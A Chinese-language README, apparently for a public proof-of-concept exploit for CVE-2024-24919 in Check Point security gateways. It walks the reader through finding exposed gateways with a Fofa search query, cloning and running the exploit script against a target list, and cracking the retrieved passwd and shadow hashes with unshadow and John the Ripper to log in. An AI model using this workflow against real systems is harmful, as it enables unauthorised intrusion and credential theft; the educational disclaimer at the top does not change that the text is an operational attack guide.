一旦 Check Point 安全网关连接到互联网并启用了远程访问 VPN 或 Mobile Access 软件刀片,攻击者就有可能读取网关上的某些信息。现已提供可缓解此漏洞的安全修复程序。
了解更多 — CVE-2024-24919
免责声明:本概念验证(POC)仅用于教育和道德测试目的。未经事先双方同意,使用此工具攻击目标属违法行为。遵守所有适用的地方、州和联邦法律是最终用户的责任。开发者不承担任何责任,也不对因使用本程序造成的任何误用或损害负责。
要寻找潜在目标,请使用 Fofa(类似于 Shodan.io):
app="Check_Point-SSL-Network-Extender"
首先,克隆仓库:
git clone https://github.com/verylazytech/CVE-2024-24919
接下来,选择你的目标,并按以下格式将其添加到 list.txt 文件中:
运行漏洞利用程序:
python3 CVE-2024-24919.py -l list.txt
现在有两种输出结果:
未成功:

成功:

在找到 passwd 和 shadow 两个文件后,你可以尝试用 JohnTheRipper 破解哈希。运行漏洞利用程序后,你会得到 passwd 和 shadow 两个文件,可以将它们合并为一个文件并尝试破解(我使用了 rockyou.txt,但也可以是任何密码字典):
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

现在,在我们破解哈希之后,就可以登录该用户了!